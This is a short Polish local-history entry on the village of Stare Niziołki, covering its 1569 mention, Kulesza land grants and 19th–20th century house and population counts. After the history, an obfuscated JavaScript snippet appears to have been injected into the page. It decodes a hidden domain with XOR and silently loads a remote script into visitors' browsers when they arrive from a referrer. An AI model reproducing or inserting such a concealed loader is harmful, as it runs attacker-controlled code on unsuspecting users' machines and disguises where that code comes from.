Stare Niziołki

Według I. Halickiej nazwa Niziołki pojawia się już w 1569 roku podczas składania przysięgi na wierność królowi polskiemu, jednak nazwa ta nie pojawia się w czasie spisu podatkowego Podlasia z 1580 roku. Wioska powstała na ziemi należącej do Kuleszów. Kuleszowie herbu Ślepowron otrzymali tutaj jeszcze w XV wieku ogromne działy ziemi, północne krańce nadania sięgały właśnie terenów tej wsi, na północ od niej (Olszewo Przyborowo) biegła już granica z Księstwem Mazowieckim, a potem województwem mazowieckim.
Trudno określić, kiedy dokładnie powstała ta miejscowość, zapewne było najwcześniej w końcu XVII wieku. Pierwsze dokładne dane pochodzącą dopiero z ostatnich lat XVIII-tego stulecia, gdy na mapie królewskiego kartografa de Perthessa pojawią się koło siebie dwie wioski: Kulesze Niesiołki Stare oraz Kulesze Niesiołki Dobki. Mapy de Perthessa nie cechują się wielką dokładnością w umiejscowieniu osad i nazwach, jednak kartograf umiejscowił je dobrze. Problem tylko, czy nazwa Niesiołki była w tym czasie używana, czy też została ona zniekształcona od nazwy Niziołek (niziołek- dawniej karzeł). Źródła z XIX wieku podają już nazwę Niziołki, w 1827 roku (Niziołki Stare) w tej wsi notowano 8 domów i 59 mieszkańców. W 1891 roku istniało tu 13 drobnoszlacheckich gospodarstw na 61 ha ziemi, średnie gospodarstwo liczyło prawie 5 ha. Podczas spisu powszechnego z 1921 roku notowano tu 19 domów i 111 mieszkańców.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);